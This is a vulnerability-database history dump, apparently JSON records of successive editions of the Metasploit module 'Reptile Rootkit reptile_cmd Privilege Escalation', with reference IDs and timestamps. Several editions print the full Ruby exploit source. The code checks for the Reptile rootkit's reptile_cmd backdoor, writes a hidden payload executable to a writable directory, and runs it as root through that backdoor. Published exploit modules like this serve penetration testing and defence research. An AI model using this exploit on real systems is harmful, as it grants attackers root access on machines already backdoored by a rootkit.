"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-05T07:36:15", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-05T09:46:03", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "exploitdb", "idList": ["EDB-ID:47997"]}, {"type": "redhat", "idList": ["RHSA-2020:0406", "RHSA-2020:0375", "RHSA-2020:0366", "RHSA-2020:0339", "RHSA-2020:0348", "RHSA-2020:0328"]}, {"type": "threatpost", "idList": ["THREATPOST:AC5C662BF26E10E5F4A8BED545AB2AFE"]}, {"type": "cve", "idList": ["CVE-2015-2802", "CVE-2020-8118", "CVE-2013-2678"]}, {"type": "kitploit", "idList": ["KITPLOIT:1588510487292907785", "KITPLOIT:9005556227715072688"]}, {"type": "f5", "idList": ["F5:K64944965", "F5:K11043204"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0163-1", "OPENSUSE-SU-2020:0156-1"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7774E9C34F1D54EAD410FE90030164D5"]}], "modified": "2020-02-05T09:46:03"}, "score": {"value": 4.4, "vector": "NONE", "modified": "2020-02-05T09:46:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-05T09:46:03", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-05T13:46:56", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2095-1:F2D89"]}, {"type": "exploitdb", "idList": ["EDB-ID:48004", "EDB-ID:47999", "EDB-ID:47998", "EDB-ID:48001", "EDB-ID:47997", "EDB-ID:48003"]}, {"type": "redhat", "idList": ["RHSA-2020:0406", "RHSA-2020:0375", "RHSA-2020:0366", "RHSA-2020:0339", "RHSA-2020:0348"]}, {"type": "threatpost", "idList": ["THREATPOST:AC5C662BF26E10E5F4A8BED545AB2AFE"]}, {"type": "cve", "idList": ["CVE-2015-2802", "CVE-2020-8118"]}, {"type": "kitploit", "idList": ["KITPLOIT:1588510487292907785"]}, {"type": "f5", "idList": ["F5:K64944965"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0163-1"]}], "modified": "2020-02-05T13:46:56"}, "score": {"value": 3.7, "vector": "NONE", "modified": "2020-02-05T13:46:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-05T13:46:56", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-05T17:37:50", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:17C5579B2870B1B0998D79C6A98F83E3", "THREATPOST:AC5C662BF26E10E5F4A8BED545AB2AFE"]}, {"type": "thn", "idList": ["THN:B6CB6E4AF571B50CB858DA0EEB69DDA9"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2095-1:F2D89"]}, {"type": "exploitdb", "idList": ["EDB-ID:48004", "EDB-ID:47999", "EDB-ID:47998", "EDB-ID:48003", "EDB-ID:48001", "EDB-ID:47997"]}, {"type": "ubuntu", "idList": ["USN-4263-2"]}, {"type": "cert", "idList": ["VU:261385"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143452", "OPENVAS:1361412562310143451", "OPENVAS:1361412562310704617"]}, {"type": "redhat", "idList": ["RHSA-2020:0406", "RHSA-2020:0375", "RHSA-2020:0366"]}, {"type": "cve", "idList": ["CVE-2015-2802"]}], "modified": "2020-02-05T17:37:50"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-02-05T17:37:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-05T17:37:50", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-06T04:15:17", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "thn", "idList": ["THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:B6CB6E4AF571B50CB858DA0EEB69DDA9"]}, {"type": "threatpost", "idList": ["THREATPOST:E62F8040B464BFA41207E6984D1CFF84", "THREATPOST:17C5579B2870B1B0998D79C6A98F83E3"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2095-1:F2D89"]}, {"type": "zdt", "idList": ["1337DAY-ID-33905", "1337DAY-ID-33900", "1337DAY-ID-33904", "1337DAY-ID-33903"]}, {"type": "ubuntu", "idList": ["USN-4269-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47999", "EDB-ID:48004"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0366", "ELSA-2020-0374"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7D6795462AFD47DE31FD5B40467B68C4"]}, {"type": "cert", "idList": ["VU:261385"]}], "modified": "2020-02-06T04:15:17"}, "score": {"value": 3.6, "vector": "NONE", "modified": "2020-02-06T04:15:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-06T04:15:17", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-06T05:45:28", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "thn", "idList": ["THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:B6CB6E4AF571B50CB858DA0EEB69DDA9"]}, {"type": "threatpost", "idList": ["THREATPOST:E62F8040B464BFA41207E6984D1CFF84", "THREATPOST:17C5579B2870B1B0998D79C6A98F83E3"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2095-1:F2D89"]}, {"type": "exploitdb", "idList": ["EDB-ID:47999", "EDB-ID:48004"]}, {"type": "zdt", "idList": ["1337DAY-ID-33905", "1337DAY-ID-33900", "1337DAY-ID-33904", "1337DAY-ID-33903", "1337DAY-ID-33898"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0366", "ELSA-2020-0374"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7D6795462AFD47DE31FD5B40467B68C4"]}, {"type": "ubuntu", "idList": ["USN-4269-1"]}], "modified": "2020-02-06T05:45:28"}, "score": {"value": 1.2, "vector": "NONE", "modified": "2020-02-06T05:45:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-06T05:45:28", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-06T07:54:37", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "thn", "idList": ["THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:B6CB6E4AF571B50CB858DA0EEB69DDA9"]}, {"type": "threatpost", "idList": ["THREATPOST:E62F8040B464BFA41207E6984D1CFF84", "THREATPOST:17C5579B2870B1B0998D79C6A98F83E3"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2095-1:F2D89"]}, {"type": "zdt", "idList": ["1337DAY-ID-33900", "1337DAY-ID-33904", "1337DAY-ID-33903", "1337DAY-ID-33905", "1337DAY-ID-33898"]}, {"type": "exploitdb", "idList": ["EDB-ID:48004", "EDB-ID:47999"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0374", "ELSA-2020-0366"]}, {"type": "ubuntu", "idList": ["USN-4269-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7D6795462AFD47DE31FD5B40467B68C4"]}], "modified": "2020-02-06T07:54:37"}, "score": {"value": 3.5, "vector": "NONE", "modified": "2020-02-06T07:54:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-06T07:54:37", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-06T13:50:59", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1610254062230481919"]}, {"type": "cve", "idList": ["CVE-2019-20406", "CVE-2019-20400", "CVE-2020-8649", "CVE-2020-8648", "CVE-2020-8647", "CVE-2013-2680"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "exploitdb", "idList": ["EDB-ID:48014", "EDB-ID:48016", "EDB-ID:48015", "EDB-ID:48006", "EDB-ID:48010", "EDB-ID:48011", "EDB-ID:48005", "EDB-ID:48020", "EDB-ID:48013"]}], "modified": "2020-02-06T13:50:59"}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-02-06T13:50:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-06T13:50:59", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": 